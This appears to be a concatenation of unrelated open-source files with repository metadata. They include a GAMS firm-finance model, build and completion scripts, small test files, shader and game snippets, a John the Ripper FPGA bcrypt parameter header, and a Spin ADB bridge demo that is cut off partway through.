# ====================================================================================================================== # Finance # - Firm financing and valuation # ====================================================================================================================== # ====================================================================================================================== # Variable definition # - Define variables and group them based on endogeneity, inflation or growth adjustment, and how they should be forecast (if exogenous) # ====================================================================================================================== $IF %stage% == "variables": $GROUP G_finance_prices empty_group_dummy[t]; $GROUP G_finance_quantities empty_group_dummy[t]; $GROUP G_finance_values vAktie[t] "Aktier og andre ejerandelsbeviser, kursværdi, Kilde: ADAM[Ws_cr_z]+ADAM[Ws_cf_z]" vAktiex[s_,t] "Værdien af virksomheden ekskl. dens finansielle aktiver (vAktie-vVirkx)" vAktieRes[t] "Diskrepans mellem observeret og beregnet værdi for virksomheden." vEBT[s_,t] "Earnings before taxes - fortjeneste før beskatning." vEBTx[s_,t] "Earnings before taxes - fortjeneste før beskatning - alene den del der hører til driften uden afkast." vEBITDA[s_,t] "Earnings before interests, taxes, depreciation, and amortization - fortjeneste før renter, skatter og afskrivninger." vFCF[s_,t] "Frie pengestrømme (Free cash flow) ekskl. fra finansiel portefølje." vVirkRenter[t] "Samlede nettoformueindkomst for finansielle og ikke-finansielle selskaber, Kilde: ADAM[Tin_cr]+ADAM[Tin_cf]" vVirkOmv[t] "Samlede omvurderinger af finansielle og ikke-finansielle selskabers nettoformue, Kilde: ADAM[Wn_cr]+ADAM[Wn_cf]-ADAM[Wn_cr][-1]-ADAM[Wn_cf][-1]-ADAM[Tfn_cr]-ADAM[Tfn_cf]" vVirkNFE[t] "Samlet nettofordringserhvervelse for finansielle og ikke-finansielle selskaber, Kilde: ADAM[Tfn_cr]+ADAM[Tfn-Cf]" vKskat[i_,s_,t]$(t.val > 1994 and d1k[i_,s_,t]) "Bogført værdi af samlet kapitalapparat fordelt på brancher." vAfskrFradrag[s_,t] "Skatte-fradrag for kapitalafskrivninger." vDividender[t]$(t.val > 1994) "Samlede udbytter af aktier og ejerandelsbeviser udbetalt af indenlandske selskaber, Kilde: ADAM[Tiu_cr_z]+ADAM[Tiu_cf_z]" vUdstedelser[t] "Nettoudstedelser af aktier fra indenlandske selskaber, Kilde: ADAM[Tfs_cr_z]+ADAM[Tfs_cf_z]" vVirkK[s_,t] "Værdi af kapitalbeholdningen til investeringspris ekskl. husholdningernes boligkapital." vVirk[portf_,t]$(not (t.val < 1994 and sameas['NetFin',portf_])) "Virksomhedernes (indenlandske selskabers) finansielle portefølje." vVirkLaan[s_,t] "Lån til gældsfinansierede investeringer." vVirkx[t] "Samlet værdi af virksomhedernes finansielle aktiver - del af finansiel portefølje som opgøres til face-value." vPension[akt,t]$(t.val > 2015) "Porteføljen af pensionsformuen." vtSelskabx[s_,t] "Den del af selskabsskatten der hører til driften." vVirkFinInd[t] "Samlet afkast (omvurderinger + renter) på virksomhedens portefølje." vVirkIndRest[t] "Rest-led i virksomheden indtjening." ; $GROUP G_finance_endo G_finance_quantities G_finance_values rVirkDisk[sp,t] "Selskabernes diskonteringsrate." rAfkastKrav[s_,t] "Investorernes forventede afkast på vAktiex. I fravær af stød er den lig afkastet på vAktiex." rVirkxAfk[t]$(t.val > 2015) "Afkastrate på virksomhedernes finansielle aktiver." rRente[portf,t]$(sameas[portf,'Pens'] or sameas[portf,'RealKred'] or sameas[portf,'Bank'] or sameas[portf,'BankGaeld']) "Renter og dividender på finansiel portefølje." rOmv[portf,t]$((sameas[portf,'IndlAktier'] and t.val > 1995) or sameas[portf,'UdlAktier'] or sameas[portf,'Pens']) "Omvurderinger på finansiel portefølje." rLaan2K[t] "Andel af investeringer som er gældsfinansierede." -vVirkIndRest[t] -vPension[akt,t]$(sameas['Guld',akt] or sameas['Bank',akt]) rIndlAktiePrem[s_,t]$(sTot[s_]) "Risikopræmie på indenlandske aktier." rFinAccelPrem[sp,t] "" vFCFxRef[sp,t] "" ; $GROUP G_finance_endo G_finance_endo$(tx0[t]); # Restrict endo group to tx0[t] $GROUP G_finance_exogenous_forecast rRente$(sameas[portf,'Obl']) rOmv$(not (sameas[portf,'IndlAktier'] or sameas[portf,'UdlAktier'] or sameas[portf,'Pens'])) rIndlAktiePrem[s_,t]$(s[s_]) rUdlAktiePrem[t] "Risikopræmie på udenlandske aktier." rVirkDiskPrem[sp,t] "Risikopræmie i diskonteringsraten for virksomhedens beslutningstagere." # Forecast as zero jvVirkRenter[t] "J-led." jvVirkOmv[t] "J-led." jrRente_pension[t] "J-led." jrOmv_pension[t] "J-led." jrOmv_UdlAktier[t] "J-led." jvVirkx[t] "J-led." vVirkIndRest[t] ; $GROUP G_finance_ARIMA_forecast rvRealKred2K[t] "Værdien af realkreditgæld i forhold til værdien af kapitalapparatet." crRenteBank[t] "Forskel på gns. obligationsrente indlånsrente for bankerne." rRente$(sameas[portf,'IndlAktier'] or sameas[portf,'UdlAktier']) ; $GROUP G_finance_other rSkatAfskr[k,t] "Skattemæssig afskrivningsrate." rAktieRes2BVT[t] "Uforklaret del af virksomhedens værdi ift. glidende gennemsnit af BVT." rvOblLaan2K[t] "Andel af investeringer som er gældsfinansierede via virksomhedsobligationer." rvVirkx[akt,t] "Andel af virksomhedens finansielle aktiver, som står i denne aktivtype." rPensAkt[akt,t] "Andel af aktiver ud af samlede aktiver." rFinAccel[sp] "Straf-rente fra finansielle friktioner på overskydende (manglende) fri pengestrømme." cFinAccel[sp,t] "" uFinAccel[sp,t] "Hældning af den approksimerede afledte af omkostnings-funktionen fra finansielle friktioner i steady state." rFinAccelTraeghed "Træghed i opdatering af reference-profit for finansiel friktion. Styrer persistens i finansiel friktion." ; $ENDIF # ====================================================================================================================== # Equations # ====================================================================================================================== $IF %stage% == "equations": $BLOCK B_finance E_rAfkastKrav[sp,t]$(tx0[t]).. rAfkastKrav[sp,t] =E= rRente['Obl',t] + rIndlAktiePrem[sp,t]; E_rAfkastKrav_sTot[t]$(tx1[t]).. rAfkastKrav[sTot,t] =E= rRente['Obl',t] + rIndlAktiePrem[sTot,t]; E_rVirkDisk[sp,t]$(tx0[t]).. rVirkDisk[sp,t] =E= rRente['Obl',t] + rVirkDiskPrem[sp,t] + rFinAccelPrem[sp,t]; E_rFinAccelPrem[sp,t]$(tx0E[t]).. rFinAccelPrem[sp,t] =E= (1 + rRente['Obl',t] + rIndlAktiePrem[sp,t]) * ( (1 - rFinAccel[sp] * tanh(uFinAccel[sp,t] * vFCFxRef[sp,t-1])) / (1 - rFinAccel[sp] * tanh(uFinAccel[sp,t] * vFCFxRef[sp,t])) - 1); E_rFinAccelPrem_tEnd[sp,t]$(tEnd[t]).. rFinAccelPrem[sp,t] =E= 0; E_vFCFxRef[sp,t]$(tx0[t]).. vFCFxRef[sp,t] =E= rFinAccelTraeghed * (vFCF[sp,t] - vFCF[sp,t-1] + vFCFxRef[sp,t-1]) + cFinAccel[sp,t]; # Rate of return on domestic shares (dividends + capital gains) E_rOmv_IndlAktier[t]$(tx0[t] and t.val > 1995).. rOmv['IndlAktier',t] =E= (vAktie[t] - vUdstedelser[t]) / (vAktie[t-1]/fv) - 1; # Value of domestic shares E_vAktie[t]$(tx0[t]).. vAktie[t] =E= vAktiex[sTot,t] + vVirkx[t] + vAktieRes[t]; E_vAktieRes[t]$(tx0[t]).. vAktieRes[t] =E= rAktieRes2BVT[t] * vVirkBVT5aarSnit[t]; E_vVirkx[t]$(tx0[t]).. vVirkx[t] =E= fv * (1 + rOmv['IndlAktier',t]) * vVirkx[t-1]/fv + jvVirkx[t]; E_vAktiex[sp,t]$(tx0E[t]).. vAktiex[sp,t] =E= (vFCF[sp,t+1] + vAktiex[sp,t+1])*fv / (1+rAfkastKrav[sp,t+1]); E_vAktiex_tEnd[sp,t]$(tEnd[t]).. vAktiex[sp,t] =E= (vFCF[sp,t] + vAktiex[sp,t])*fv / (1+rAfkastKrav[sp,t]); E_vAktiex_sTot[t]$(tx0E[t]).. vAktiex[sTot,t] =E= (vFCF[sTot,t+1] + vAktiex[sTot,t+1])*fv / (1+rAfkastKrav[sTot,t+1]); E_vAktiex_sTot_tEnd[t]$(tEnd[t]).. vAktiex[sTot,t] =E= sum(sp, vAktiex[sp,t]); E_rIndlAktiePrem_sTot[t]$(tx0E[t]).. vAktiex[sTot,t] =E= sum(sp, vAktiex[sp,t]); # Omvurderinger af udenlandske aktier E_rOmv_UdlAktier[t]$(tx0[t]).. rOmv['UdlAktier',t] + rRente['UdlAktier',t] =E= rRente['Obl',t] + rUdlAktiePrem[t] + jrOmv_UdlAktier[t]; # Frie pengestrømme (Free Cash Flow) ekskl. fra finansiel fra portefølje E_vFCF_sTot[t]$(tx0[t]).. vFCF[sTot,t] =E= vEBITDA[sTot,t] - rRente['Obl',t] * vVirkLaan[sTot,t-1]/fv - vI_s[iTot,spTot,t] + vHhInvestx[aTot,t] + vVirkLaan[sTot,t] - vVirkLaan[sTot,t-1]/fv - vtSelskabx[sTot,t] # Nettooverførsler til virksomhederne + vOffLandKoeb[t] - vSelvstKapInd[aTot,t] + vOffTilVirk[t] - vOffFraVirk[t] - vHhFraVirk[t] + vVirkIndRest[t]; E_vFCF[sp,t]$(tx0[t]).. vFCF[sp,t] =E= vEBITDA[sp,t] - rRente['Obl',t] * vVirkLaan[sp,t-1]/fv - vI_s[iTot,sp,t] + vHhInvestx[aTot,t] * vI_s[iTot,sp,t] / sum(s$(sp[s]), vI_s[iTot,s,t]) + sameas[sp,'bol'] * vIBolig[t] + vVirkLaan[sp,t] - vVirkLaan[sp,t-1]/fv - vtSelskabx[sp,t] # Nettooverførsler til virksomhederne + (vOffLandKoeb[t] - vSelvstKapInd[aTot,t] + vOffTilVirk[t] - vOffFraVirk[t] - vHhFraVirk[t] + vVirkIndRest[t]) * vVirkK[sp,t] / vVirkK[sTot,t]; # Earnings before interests, corporate taxes, and depreciation. Payroll taxes are included in both vtNetYAfg and vL, and are added back. E_vEBITDA[sp,t]$(tx0[t]).. vEBITDA[sp,t] =E= vY[sp,t] - vLoensum[sp,t] - vSelvstLoen[sp,t] - vR[sp,t] - vtNetYAfg[sp,t] - sameas[sp,'bol'] * (vLejeAfEjerBolig[t]); # Lejeværdi af egen bolig trækkes fra, da det går til husejerne E_vEBITDA_tot[t]$(tx0[t]).. vEBITDA[sTot,t] =E= sum(sp, vEBITDA[sp,t]); # Earnings before taxes E_vEBT_sTot[t]$(tx0[t]).. vEBT[sTot,t] =E= vEBITDA[sTot,t] - vAfskrFradrag[sTot,t] + rRente['Obl',t] * vVirk['Obl',t-1]/fv + rRente['Bank',t] * vVirk['Bank',t-1]/fv - rRente['RealKred',t] * vVirk['RealKred',t-1]/fv; E_vEBT[sp,t]$(tx0[t]).. vEBT[sp,t] =E= vEBITDA[sp,t] - vAfskrFradrag[sp,t] + (rRente['Obl',t] * vVirk['Obl',t-1]/fv + rRente['Bank',t] * vVirk['Bank',t-1]/fv - rRente['RealKred',t] * vVirk['RealKred',t-1]/fv) * vVirkK[sp,t] / vVirkK[sTot,t]; # Earnings before taxes ekskl. afkast på portefølje E_vEBTx_sTot[t]$(tx0[t]).. vEBTx[sTot,t] =E= vEBITDA[sTot,t] - vAfskrFradrag[sTot,t] - rRente['Obl',t] * vVirkLaan[sTot,t-1]/fv; E_vEBTx[sp,t]$(tx0[t]).. vEBTx[sp,t] =E= vEBITDA[sp,t] - vAfskrFradrag[sp,t]- rRente['Obl',t] * vVirkLaan[sp,t-1]/fv; # Den del af selskabsskat der hører til driften E_vtSelskabx_sTot[t]$(tx0[t]).. vtSelskabx[sTot,t] =E= tSelskab[t] * ftSelskab[t] * vEBTx[sTot,t] + vtSelskabNord[t]; E_vtSelskabx[sp,t]$(tx0[t]).. vtSelskabx[sp,t] =E= tSelskab[t] * ftSelskab[t] * vEBTx[sp,t] + sameas[sp,'udv'] * vtSelskabNord[t]; # Dividender på indenlandske aktier E_vDividender[t]$(tx0[t] and t.val > 1994).. vDividender[t] =E= rRente['IndlAktier',t] * vAktie[t-1]/fv; # Udstedelser bestemmes residualt for at ramme en eksogen dividende-rate E_vUdstedelser[t]$(tx0[t]).. - vUdstedelser[t] =E= vFCF[sTot,t] - (vVirkx[t] - vVirkx[t-1]/fv) + rVirkxAfk[t] * vVirkx[t-1]/fv - (vtSelskab[sTot,t] - vtSelskabx[sTot,t]) - vDividender[t]; # Tax book value of firm shares E_vKskat[k,sp,t]$(tx0[t] and t.val > 1994 and d1k[k,sp,t]).. vKskat[k,sp,t] =E= (1-rSkatAfskr[k,t]) * vKskat[k,sp,t-1]/fv + vI_s[k,sp,t] - sameas[sp,'bol'] * vIBolig[t]; E_vKskat_kTot[t]$(tx0[t]).. vKskat[kTot,sTot,t] =E= sum([k,sp], vKskat[k,sp,t]); E_vAfskrFradrag[sp,t]$(tx0[t]).. vAfskrFradrag[sp,t] =E= sum(k, rSkatAfskr[k,t] * vKskat[k,sp,t-1]/fv); E_vAfskrFradrag_sTot[t]$(tx0[t]).. vAfskrFradrag[sTot,t] =E= sum(sp, vAfskrFradrag[sp,t]); # Value of financial assets and mortgages E_vVirk[akt,t]$(tx0[t] and not sameas['obl',akt]).. vVirk[akt,t] =E= rvVirkx[akt,t] * vVirkx[t]; E_vVirk_obl[t]$(tx0[t]).. vVirk['Obl',t] =E= rvVirkx['obl',t] * vVirkx[t] - rvOblLaan2K[t] * vVirkK[sTot,t]; E_vVirk_RealKred[t]$(tx0[t]).. vVirk['RealKred',t] =E= rvRealKred2K[t] * vVirkK[sTot,t]; E_rLaan2K[t]$(tx0[t]).. rLaan2K[t] =E= rvRealKred2K[t] + rvOblLaan2K[t]; E_vVirkK[sp,t]$(tx0[t]).. vVirkK[sp,t] =E= sum(k, pI_s[k,sp,t] * qK[k,sp,t]) - sameas[sp,'bol'] * (pI_s['iB','bol',t] * qKBolig[t]); E_vVirkK_sTot[t]$(tx0[t]).. vVirkK[sTot,t] =E= sum(sp, vVirkK[sp,t]); E_vVirk_NetFin[t]$(tx0[t] and t.val > 1993).. vVirk['NetFin',t] =E= vVirkx[t] - vVirkLaan[sTot,t]; E_vVirkLaan_sTot[t]$(tx0[t]).. vVirkLaan[sTot,t] =E= rLaan2K[t] * vVirkK[sTot,t]; E_vVirkLaan[sp,t]$(tx0[t]).. vVirkLaan[sp,t] =E= rLaan2K[t] * vVirkK[sp,t]; # Netto renteudgifter (afkast) på virksomhedens portefølje E_vVirkFinInd[t]$(tx0[t]).. vVirkFinInd[t] =E= sum(akt, (rRente[akt,t] + rOmv[akt,t]) * vVirk[akt,t-1]/fv) - (rRente['RealKred',t] + rOmv['RealKred',t]) * vVirk['RealKred',t-1]/fv - vJordrente[t] + jvVirkOmv[t] + jvVirkRenter[t]; E_rVirkxAfk[t]$(tx0[t] and t.val > 2015).. rVirkxAfk[t] =E= (vVirkFinInd[t] + rRente['Obl',t] * vVirkLaan[sTot,t-1]/fv) / (vVirkx[t-1]/fv); # Nettofordringserhvervelsen er tæt knyttet til FCFE E_vVirkNFE[t]$(tx0[t]).. vVirkNFE[t] =E= (vVirk['NetFin',t] - vAktie[t]) - (vVirk['NetFin',t-1]/fv - vAktie[t-1]/fv) - vVirkOmv[t]; E_vVirkRenter[t]$(tx0[t]).. vVirkRenter[t] =E= sum(akt, rRente[akt,t] * vVirk[akt,t-1]/fv) - rRente['RealKred',t] * vVirk['RealKred',t-1]/fv - vDividender[t] - vJordrente[t] + jvVirkRenter[t]; E_vVirkOmv[t]$(tx0[t]).. vVirkOmv[t] =E= sum(akt, rOmv[akt,t] * vVirk[akt,t-1]/fv) - rOmv['RealKred',t] * vVirk['RealKred',t-1]/fv - rOmv['IndlAktier',t] * vAktie[t-1]/fv + jvVirkOmv[t]; # Renter og omvurderinger for pensionsselskaberne E_rRente_Pension[t]$(tx0[t] and t.val > 1994).. rRente['Pens',t] =E= ( rRente['Obl',t] * vPension['Obl',t-1]/fv + rRente['IndlAktier',t] * vPension['IndlAktier',t-1]/fv + rRente['UdlAktier',t] * vPension['UdlAktier',t-1]/fv ) / (vPension['Obl',t-1]/fv + vPension['IndlAktier',t-1]/fv + vPension['UdlAktier',t-1]/fv) + jrRente_pension[t]; E_rOmv_Pension[t]$(tx0[t] and t.val > 1994).. rOmv['Pens',t] =E= ( rOmv['Obl',t] * vPension['Obl',t-1]/fv + rOmv['IndlAktier',t] * vPension['IndlAktier',t-1]/fv + rOmv['UdlAktier',t] * vPension['UdlAktier',t-1]/fv ) / (vPension['Obl',t-1]/fv + vPension['IndlAktier',t-1]/fv + vPension['UdlAktier',t-1]/fv) + jrOmv_pension[t]; E_vPension_pension[t]$(tx0[t] and t.val > 1993).. vPension['Pens',t] =E= -vHh['Pens',aTot,t]; E_vPension_akt[akt,t]$(tx0[t] and (sameas['Obl',akt] or sameas['IndlAktier',akt] or sameas['UdlAktier',akt]) and t.val > 1993).. vPension[akt,t] =E= rPensAkt[akt,t] * (-vPension['Pens',t]); # Realkreditrenten skal følge obligationsrenten, da passivsiden er inkluderet i virksomhedernes obligationsbeholdning - bidragssats er i FISIM E_rRente_RealKred[t]$(tx0[t]).. rRente['RealKred',t] =E= rRente['Obl',t]; # Indlånsrenten og obligationsrenten er korreleret E_rRente_Bank[t]$(tx0[t]).. rRente['Bank',t] =E= rRente['Obl',t] + crRenteBank[t]; # Indlåns- og udlånsrenten er ens, da rentemarignal er fanget i FISIM dvs. input af (finansielle) tjenester E_rRente_BankGaeld[t]$(tx0[t]).. rRente['BankGaeld',t] =E= rRente['Bank',t]; $ENDBLOCK $ENDIF
GAMS
4
gemal/MAKRO
Model/finance.gms
[ "MIT" ]
;################################################## ; Author: tkoi <http://www.autohotkey.net/~tkoi> ; Modified by: majkinetor ; Modified by: Pulover ; www.autohotkey.com/community/viewtopic.php?f=2&t=40468 ; Additional thanks to just me for adapting it to AHK_L 64bit ;################################################## ILButton(HBtn, Images, Large := 0, Align := "center", Margin := "1 1 1 1") { static BCM_SETIMAGELIST=0x1602, a_right=1, a_top=2, a_bottom=3, a_center=4 if Images is not integer { hIL := IL_Create(1, 2, Large) Loop, Parse, Images, |, %A_Space%%A_Tab% { if (A_LoopField = "") { IL_Add(hIL, v1, v2) continue } if (k := InStr(A_LoopField, ":", 0, 0)) && ( k!=2 ) v1 := SubStr(A_LoopField, 1, k-1), v2 := SubStr(A_LoopField, k+1) else v1 := A_LoopField, v2 := 0 IL_Add(hIL, v1, v2) } } else hIL := Images VarSetCapacity(BIL, A_PtrSize + (5 * 4) + (A_PtrSize - 4), 0), NumPut(hIL, BIL), NumPut(a_%Align%, BIL, A_PtrSize + (4 * 4), "UInt") Loop, Parse, Margin, %A_Space% NumPut(A_LoopField, BIL, A_PtrSize + ((A_Index - 1) * 4), "Int") SendMessage, BCM_SETIMAGELIST,,&BIL,, ahk_id %HBtn% ifEqual, ErrorLevel, 0, return 0, DllCall("ImageList_Destroy", "Ptr", hIL) return hIL }
AutoHotkey
4
standardgalactic/PuloversMacroCreator
LIB/ILButton.ahk
[ "Unlicense" ]
if "%REBUILD%"=="" ( if "%BUILD_ENVIRONMENT%"=="" ( curl --retry 3 -k https://s3.amazonaws.com/ossci-windows/mkl_2020.2.254.7z --output %TMP_DIR_WIN%\mkl.7z ) else ( aws s3 cp s3://ossci-windows/mkl_2020.2.254.7z %TMP_DIR_WIN%\mkl.7z --quiet ) if errorlevel 1 exit /b if not errorlevel 0 exit /b 7z x -aoa %TMP_DIR_WIN%\mkl.7z -o%TMP_DIR_WIN%\mkl if errorlevel 1 exit /b if not errorlevel 0 exit /b ) set CMAKE_INCLUDE_PATH=%TMP_DIR_WIN%\mkl\include set LIB=%TMP_DIR_WIN%\mkl\lib;%LIB%
Batchfile
3
xiaohanhuang/pytorch
.jenkins/pytorch/win-test-helpers/installation-helpers/install_mkl.bat
[ "Intel" ]
__includes ["SOM.nls"] ; TSet stores the Training Set globals [ TSet ] ; Setup procedure: initially, a weight is assigned to every node. to setup ca ; Create the colors to learn set TSet n-values TSet-size [n-values 3 [random-float 1]] create-ordered-turtles TSet-size [ fd 15 set size 7 set shape "circle" let w (item who TSet) set color rgb (255 * item 0 w) (255 * item 1 w) (255 * item 2 w) ] ; Create the learning nodes and distribute them in the world SOM:setup-Lnodes world-width "SqGrid" 3 "R" ; Update the patches with the color/weight vector of the learning node ; in it ask patches [ let w [weight] of one-of SOM:Lnodes-here set pcolor rgb (255 * item 0 w) (255 * item 1 w) (255 * item 2 w) ] reset-ticks end to go SOM:SOM TSet Training-Time end to SOM:ExternalUpdate ask patches [ let w [weight] of one-of SOM:Lnodes-here set pcolor rgb (255 * item 0 w) (255 * item 1 w) (255 * item 2 w) ] tick end @#$#@#$#@ GRAPHICS-WINDOW 182 10 556 385 -1 -1 6.0 1 10 1 1 1 0 0 0 1 -30 30 -30 30 1 1 1 ticks 30.0 SLIDER 10 10 182 43 Training-Time Training-Time 0 1000 140.0 1 1 NIL HORIZONTAL BUTTON 119 154 182 187 SOM! go NIL 1 T OBSERVER NIL NIL NIL NIL 1 BUTTON 10 154 73 187 NIL setup\n NIL 1 T OBSERVER NIL NIL NIL NIL 1 MONITOR 10 198 71 243 Radius precision (SOM:R ticks) 3 17 1 11 SLIDER 10 43 182 76 TSet-size TSet-size 0 100 7.0 1 1 NIL HORIZONTAL MONITOR 71 198 182 243 Learning Rate precision (SOM:L ticks) 5 17 1 11 SLIDER 10 121 184 154 Initial-Learning-Rate Initial-Learning-Rate 0 1 0.157 .001 1 NIL HORIZONTAL @#$#@#$#@ @#$#@#$#@ default true 0 Polygon -7500403 true true 150 5 40 250 150 205 260 250 circle false 0 Circle -7500403 true true 0 0 300 Circle -16777216 false false 0 0 300 @#$#@#$#@ NetLogo 6.1.1 @#$#@#$#@ @#$#@#$#@ @#$#@#$#@ @#$#@#$#@ @#$#@#$#@ default 0.0 -0.2 0 0.0 1.0 0.0 1 1.0 0.0 0.2 0 0.0 1.0 link direction true 0 Line -7500403 true 150 150 90 180 Line -7500403 true 150 150 210 180 @#$#@#$#@ 0 @#$#@#$#@
NetLogo
4
fsancho/IA
11. Machine Learning/Self Organizing Maps/SOM-color.nlogo
[ "MIT" ]
//The first name of the bot string FirstName = "Test"; //The last name of the bot string LastName = "Bot"; //The outfit name that the bot will be wearing // If this is set to "", then the bot will be wearing // the clothes that the owner is wearing currently. // If this is not set to "", it will load the outfit // from the database that was created by botSetOutfit. string OutfitName = ""; //The position that the bot will be created at in the sim vector startPosition = llGetPos(); //This stores the ID of the bot, which is passed into the all other bot // commands to identify which bot is to be moved/edited. key botID; default { state_entry() { //This creates a bot in the sim with the given name, outfit at the given start position. botID = botCreateBot(FirstName, LastName, OutfitName, startPosition, BOT_CREATE_DEFAULT); } touch_start(integer n) { //Removes the bot that we created from the sim botRemoveBot(botID); } }
LSL
4
Asterionworld/ether
doc/bot LSL Functions/Examples/bot Creation.lsl
[ "BSD-3-Clause" ]
time(t *uint) uint #Foreign("time") main() { ::currentAllocator = Memory.newArenaAllocator(16 * 1024) rs := time(null) num := cast(Random.xorshift32(ref rs) % 100 + 1, int) while true { Stdout.write("Your guess: ") input := Stdin.tryReadLine() if input.error != 0 { break } pr := int.tryParse(input.value) if !pr.hasValue { continue } guess := pr.value if guess < num { Stdout.writeLine("Try higher") } else if guess > num { Stdout.writeLine("Try lower") } else { Stdout.writeLine("You got it!") break } } }
mupad
3
jturner/muon
examples/guessing_game.mu
[ "MIT" ]
# usage: source apollo_auto_complete.bash COMMANDS="config build build_dbg build_opt build_cpu build_gpu build_opt_gpu test coverage lint \ buildify check build_fe build_teleop build_prof doc clean format usage -h --help" MODULES="$(find /apollo/modules/* -maxdepth 0 -type d -printf "%f ")" MODULES="cyber ${MODULES}" function _complete_apollo_func() { COMPREPLY=() local cur="${COMP_WORDS[COMP_CWORD]}" local prev="${COMP_WORDS[COMP_CWORD - 1]}" local cmds="$(echo ${COMMANDS} | xargs)" local modules="$(echo ${MODULES} | xargs)" if [ "${COMP_CWORD}" -eq 1 ]; then COMPREPLY=($(compgen -W "${cmds}" -- ${cur})) elif [ "${COMP_CWORD}" -eq 2 ]; then case "${prev}" in build | build_dbg | build_opt | build_cpu | build_gpu | test | coverage) COMPREPLY=($(compgen -W "${modules}" -- ${cur})) ;; config) COMPREPLY=($(compgen -W "--interactive --noninteractive --help" -- ${cur})) ;; clean) COMPREPLY=($(compgen -W "--bazel --core --log --expunge --all --help" -- ${cur})) ;; lint) COMPREPLY=($(compgen -W "--py --sh --cpp --all --help" -- ${cur})) ;; format) COMPREPLY=($(compgen -W "--python --bazel --cpp --shell --markdown --all --help" -- ${cur})) ;; esac fi } complete -F _complete_apollo_func -o default apollo.sh
Shell
4
jzjonah/apollo
scripts/apollo_auto_complete.bash
[ "Apache-2.0" ]
/*--------------------------------------------------------------------------------------------- * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for license information. *--------------------------------------------------------------------------------------------*/ import * as assert from 'assert'; import { MockDebugAdapter } from 'vs/workbench/contrib/debug/test/browser/mockDebug'; import { timeout } from 'vs/base/common/async'; suite('Debug - AbstractDebugAdapter', () => { suite('event ordering', () => { let adapter: MockDebugAdapter; let output: string[]; setup(() => { adapter = new MockDebugAdapter(); output = []; adapter.onEvent(ev => { output.push((ev as DebugProtocol.OutputEvent).body.output); Promise.resolve().then(() => output.push('--end microtask--')); }); }); const evaluate = async (expression: string) => { await new Promise(resolve => adapter.sendRequest('evaluate', { expression }, resolve)); output.push(`=${expression}`); Promise.resolve().then(() => output.push('--end microtask--')); }; test('inserts task boundary before response', async () => { await evaluate('before.foo'); await timeout(0); assert.deepStrictEqual(output, ['before.foo', '--end microtask--', '=before.foo', '--end microtask--']); }); test('inserts task boundary after response', async () => { await evaluate('after.foo'); await timeout(0); assert.deepStrictEqual(output, ['=after.foo', '--end microtask--', 'after.foo', '--end microtask--']); }); test('does not insert boundaries between events', async () => { adapter.sendEventBody('output', { output: 'a' }); adapter.sendEventBody('output', { output: 'b' }); adapter.sendEventBody('output', { output: 'c' }); await timeout(0); assert.deepStrictEqual(output, ['a', 'b', 'c', '--end microtask--', '--end microtask--', '--end microtask--']); }); }); });
TypeScript
5
sbj42/vscode
src/vs/workbench/contrib/debug/test/browser/rawDebugSession.test.ts
[ "MIT" ]
yield "Message: ${greeting}"
Smarty
0
Martin-real/spring-boot-2.1.0.RELEASE
spring-boot-project/spring-boot-autoconfigure/src/test/resources/templates/message.tpl
[ "Apache-2.0" ]
L DASYNC e_dasync_err.h e_dasync_err.c
eC
0
madanagopaltcomcast/pxCore
examples/pxScene2d/external/libnode-v10.15.3/deps/openssl/openssl/engines/e_dasync.ec
[ "Apache-2.0" ]
varying vec2 vTextureCoord; varying vec4 vColor; varying float vTextureId; uniform sampler2D uSamplers[%count%]; void main(void){ vec4 color; %forloop% gl_FragColor = color * vColor; }
GLSL
3
fanlistener/pixijs
packages/core/src/batch/texture.frag
[ "MIT" ]
--TEST-- JIT XOR: 003 --INI-- opcache.enable=1 opcache.enable_cli=1 opcache.file_update_protection=0 opcache.jit_buffer_size=32M ;opcache.jit_debug=257 --EXTENSIONS-- opcache --FILE-- <?php function foo($a, $b) { $res = $a ^ $b; var_dump($res); } foo("abc", "\001\002\003"); ?> --EXPECT-- string(3) "```"
PHP
4
NathanFreeman/php-src
ext/opcache/tests/jit/xor_003.phpt
[ "PHP-3.01" ]
/* * This software is Copyright (c) 2016 Denis Burykin * [denis_burykin yahoo com], [denis-burykin2014 yandex ru] * and it is hereby released to the general public under the following terms: * Redistribution and use in source and binary forms, with or without * modification, are permitted. * */ // ************************************************************ // // ISE Version: 14.5 // // Include as Global File in Compile List: main.vh log2.vh // Set as Top Module: ztex_inouttraffic // // ************************************************************ // Parameters for ztex_inouttraffic `define MAIN_MODULE_INST bcrypt_v2 `define BITSTREAM_TYPE 16'hbc01 `define INPUT_FIFO_INST fifo_16_sync_8kb // prog_full asserts when input fifo has <=6kb free // must be power of 2; actual size for output fifo is 2 bytes less `define OUTPUT_FIFO_SIZE 8192 // Parameters for pkt_comm `define PKT_COMM_VERSION 2 `define RANGES_MAX 4 `define CHAR_BITS 8 `define PLAINTEXT_LEN 72 // outpkt_v3 `define OUTPKT_TYPE_MSB 2 `define OUTPKT_TYPE_CMP_EQUAL 'b01 `define OUTPKT_TYPE_PACKET_DONE 'b10 `define OUTPKT_TYPE_RESULT 'b11 `define OUTPKT_TYPE_CMP_RESULT 'b100 `define USE_OUTPKT_CMP_EQUAL `define USE_OUTPKT_PACKET_DONE `define USE_OUTPKT_RESULT `define USE_OUTPKT_CMP_RESULT `define RESULT_LEN 24 `define OUTPKT_DATA_MAX_LEN (8 + `RESULT_LEN) `define NUM_HASHES 4 `define HASH_NUM_MSB `MSB(`NUM_HASHES-1)
SystemVerilog
3
bourbon-hunter/OSCPRepo
Tools/JohnTheRipper-bleeding-jumbo/src/ztex/fpga-bcrypt/main.vh
[ "MIT" ]
{{ Propeller ADB bridge -- multiple connections with IO demo copyright 2011 spiritplumber@gmail.com buy my kits at www.f3.to! based off microbridge ( http://code.google.com/p/microbridge/ ) which is copyright 2011 Niels Brouwers Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. }} CON _clkmode = xtal1 + pll16x ' _xinfreq = 6_000_000 _clkfreq = 96_000_000 OBJ term : "FullDuplexSerial" adb:"adb-shell-module" outbuf:"stringoutput_external_buffer" inbuf:"stringoutput_external_buffer" PUB demo term.start(31,30,0,115200) outbuf.init(@outbufmem,128) inbuf.init(@inbufmem,128) ' bytemove(adb.shellbuf,string("tcp:01234"),10) ' use this for telnet socket instead repeat result := \adb.PrimaryHandshake if result>-1 result := 